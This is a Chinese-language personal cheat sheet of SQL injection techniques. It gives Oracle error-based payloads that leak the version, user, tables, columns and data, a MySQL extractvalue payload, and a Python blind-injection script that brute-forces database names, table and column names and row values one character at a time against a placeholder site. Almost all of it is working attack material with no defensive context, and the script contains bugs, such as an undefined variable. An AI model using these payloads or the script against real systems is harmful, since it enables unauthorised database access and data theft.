SQL注入记录

报错注入：

oracle payload:

获取数据库版本

a' or (select dbms_xdb_version.makeversioned((select banner from sys.v_$version where rownum like 1)) from dual) like 'a

获取用户名

a' or (select dbms_xdb_version.makeversioned((select user from dual)) from dual) like 'a

获取表名

a' or (select dbms_xdb_version.makeversioned((select table_name from all_tables where rownum like 1)) from dual) like 'a

获取下一个表名

a' or (select dbms_xdb_version.makeversioned((select table_name from all_tables where rownum like 1 and table_name not like 'DUAL')) from dual) like 'a

获取表中的列名

a' or (select dbms_xdb_version.makeversioned((select column_name from all_tab_columns where table_name like 'SYSTEM_PRIVILEGE_MAP' and rownum like 1)) from dual) like 'a

获取下一个列名

a' or (select dbms_xdb_version.makeversioned((select column_name from all_tab_columns where table_name like 'SYSTEM_PRIVILEGE_MAP' and rownum like 1 and column_name not like 'PRIVILEGE')) from dual) like 'a

获取数据

a' or (select dbms_xdb_version.makeversioned((select name from SYSTEM_PRIVILEGE_MAP where rownum like 1)) from dual) like 'a

Mysql payload:

extractvalue(rand(),+concat(0x3a,substring(version(),1,30)))

盲注：

import requests

url1 = "https://www.test.com/search/index/?param1=1+or+"
url2 = "--+¶m2=aaa¶m3=1"

# 盲注获取数据长度
def getlength(payload):
    length = 0
    url = url1 + payload + str(length) + url2
    #print url
    r = requests.get(url)
    while(len(r.content) < 70000):    #这里判断根据返回数据长度来区分
        length = length + 1
        payload_tmp = payload + str(length)
        url = url1 + payload_tmp + url2
        r = requests.get(url)
    print length
    return length

#盲注对字段每个字符逐一爆破
def getstr(payload):
    i = 0
    #all_str = "_abcdefghijklmnopqrstuvwxyz"
    all_str = "_.-@%$#!<>'?abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    like_str = "='" + all_str[i] + "'"
    url = url1 + payload + like_str + url2
    r = requests.get(url)
    while(len(r.content) < 70000):
        i = i + 1
        like_str = "='" + all_str[i] + "'"
        url = url1 + payload + like_str + url2
        #print url
        r = requests.get(url)
    print all_str[i]
    return all_str[i]

#数据库字段
database_length = getlength("length(database())=")
database_str = ""
for i in range(1, database_length + 1):
    payload = "(substr(database()," + str(i) + ",1))"
    database_str += getstr(payload)

#数据库表字段
table_count = getlength("(select+count(*)+from+information_schema.tables+where+table_schema='database')=")
table_name_str = ""
for i in range(1, table_name_len + 1):
    payload = "(substr((select+table_name+from+information_schema.columns+where+table_schema='database'+and+column_name='password'+limit+0,1)," + str(i) + ",1))"
    table_name_str += getstr(payload)

#表中列字段
colume_count = getlength("(SELECT+COUNT(*)+FROM+information_schema.COLUMNS+WHERE+TABLE_SCHEMA='database'+AND+TABLE_NAME='table')=")

for i in range(0, colume_count):
	column_name_length = getlength("length((select+column_name+from+information_schema.columns+where+table_schema='database'+and+table_name='table'+limit+"+str(i)+",1))=")
	columu_name_str = ""
	for j in range(1, column_name_length + 1):
		payload = "(substr((select+column_name+from+information_schema.columns+where+table_schema='database'+and+table_name='table'+limit+"+str(i)+",1)," + str(j) + ",1))"
		columu_name_str += getstr(payload)

	print columu_name_str

#获取数据
data = ""
data_len = getlength("length((select+val+from+table+order+by+create_time+desc+limit+0,1))=")
print data_len 
for i in range(1, data_len + 1):
	payload = "(substr((select+val+from+table+order+by+create_time+desc+limit+0,1)," + str(i) + ",1))"
	data += getstr(payload)
print data